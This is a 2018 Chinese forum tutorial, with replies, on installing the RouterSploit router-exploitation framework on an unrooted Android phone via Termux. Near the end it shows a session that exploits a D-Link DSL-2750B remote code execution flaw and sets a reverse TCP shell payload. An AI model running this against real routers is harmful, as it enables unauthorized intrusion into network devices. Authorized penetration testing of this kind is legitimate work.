首页
社区
课程
招聘
[分享] 在Android 手机上搭建RouterSploit 测试环境(无需root)
2018-10-21 18:39 10442

[分享] 在Android 手机上搭建RouterSploit 测试环境(无需root)

2018-10-21 18:39
10442

最近在Android手机上搭建了RouterSploit 攻击测试环境,这样就可以方便的测试一些AP了。(提示,测试公开的WiFi AP之前,请征得对方的同意哦。)
完整的安装包和教程: Android_routersploit 

RouterSploit  开始是一个专门针对路由器的测试工具,后来它的目标貌似转变成了能够攻击嵌入式设备的框架。

在Android手机上是利用termux这个工具来操作的。
这里下载:  android termux 下载

termux默认是安装了python3的,因此,对于最新的 RouterSploit 是刚好支持的。如果想要支持python2的工具,那么可以按照这个网址的提示进行安装。


这个基本快捷键是这样的:
(注意:网上的资料说tab快捷键是 音量键+, D。然而并不是。 试了好多遍)

  • tab命令补全 (volum +, and t)
  • 展示所有支持的快捷键 (volum +, and q)
  • 光标的左/右移动(volum +, and a/d)
  • 前一个/后一个 commands (volum +, and w/s)

一些预备的库需要提前安装:
pkg update
pkg install git wget clang
apt install  libffi libffi-dev



安装用于 cryptography的

wgethttps://github.com/desword/shellcode_tools/raw/master/Android_routersploit/openssl_1.1.1-2_aarch64.deb.gz
wgethttps://github.com/desword/shellcode_tools/raw/master/Android_routersploit/openssl-dev_1.1.1-2_aarch64.deb.gz
wgethttps://github.com/desword/shellcode_tools/raw/master/Android_routersploit/openssl-tool_1.1.1-2_aarch64.deb.gz
gunzip openssl_1.1.1-2_arm.deb.gz
gunzip openssl-dev_1.1.1-2_arm.deb.gz
gunzip openssl-tool_1.1.1-2_arm.deb.gz
dpkg -i openssl_1.1.1-2_arm.deb
dpkg -i openssl-dev_1.1.1-2_arm.deb
dpkg -i openssl-tool_1.1.1-2_arm.deb
这里的默认安装会有问题,因此需要按照老版本的上述openssl。


接着就是clone   RouterSploit .并且安装一些必要的库文件了以及正式安装 RouterSploit
git clonehttps://www.github.com/threat9/routersploit
cd routersploit
pip install -r requirements.txt
 
这样就完成了安装。
网络如果不好可能会出现安装失误,多安装几次就好。 

接下来就可以按照这里面的方式,最后的几个命令来测试目标的AP了。


python rsf.py
use scanner/autopwn
set target 192.168.1.1
rsf (AutoPwn) > use exploits/routers/dlink/dsl_2750b_rce
rsf (D-Link DSL-2750B RCE) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (D-Link DSL-2750B RCE) > check
[+] Target is vulnerable
rsf (D-Link DSL-2750B RCE) > run
cmd > show payloads
cmd > set payload reverse_tcp
cmd (MIPSBE Reverse TCP) > show options
cmd (MIPSBE Reverse TCP) > set lhost 192.168.1.10
cmd (MIPSBE Reverse TCP) > run



觉得好的同学请多多star, 多多fork, :)





阿里云助力开发者!2核2G 3M带宽不限流量!6.18限时价,开 发者可享99元/年,续费同价!

最后于 2018-11-7 15:22 被二当家a编辑 ,原因:
收藏
点赞0
打赏
分享
最新回复 (5)
雪    币: 1
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
星辉 2018-10-27 19:25
2
0
gunzip错误
雪    币: 2182
活跃值: (5712)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
微启宇 2018-10-30 15:21
3
0
wget https://github.com/desword/shellcode_tools/raw/master/Android_routersploit/openssl_1.1.1-2_aarch64.deb.gz
wget https://github.com/desword/shellcode_tools/raw/master/Android_routersploit/openssl-dev_1.1.1-2_aarch64.deb.gz
wget https://github.com/desword/shellcode_tools/raw/master/Android_routersploit/openssl-tool_1.1.1-2_aarch64.deb.gz
改成
wget https://github.com/desword/shellcode_tools/raw/master/Android_routersploit/openssl_1.1.1-2_arm.deb.gz
wget https://github.com/desword/shellcode_tools/raw/master/Android_routersploit/openssl-dev_1.1.1-2_arm.deb.gz
wget https://github.com/desword/shellcode_tools/raw/master/Android_routersploit/openssl-tool_1.1.1-2_arm.deb.gz
在下载看看
雪    币: 5929
活跃值: (1661)
能力值: ( LV7,RANK:150 )
在线值:
发帖
回帖
粉丝
二当家a 2 2018-11-8 15:09
4
0
星辉 gunzip错误
我这里可以成功下载和解压的。
可能是手机下载的时候有点问题,你多下载几次,或者按照 @爱我佳鑫 的方法试试。
雪    币: 357
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
炎羽 2018-11-11 03:18
5
0
也不知NetHunter有这些工具没
雪    币: 5929
活跃值: (1661)
能力值: ( LV7,RANK:150 )
在线值:
发帖
回帖
粉丝
二当家a 2 2018-11-11 09:18
6
0
炎羽 也不知NetHunter有这些工具没
看这里貌似是没有这个routersploit的,https://github.com/offensive-security/kali-nethunter/wiki
而且nethunter需要重新刷机+root。咱这个不用。
游客
登录 | 注册 方可回帖
返回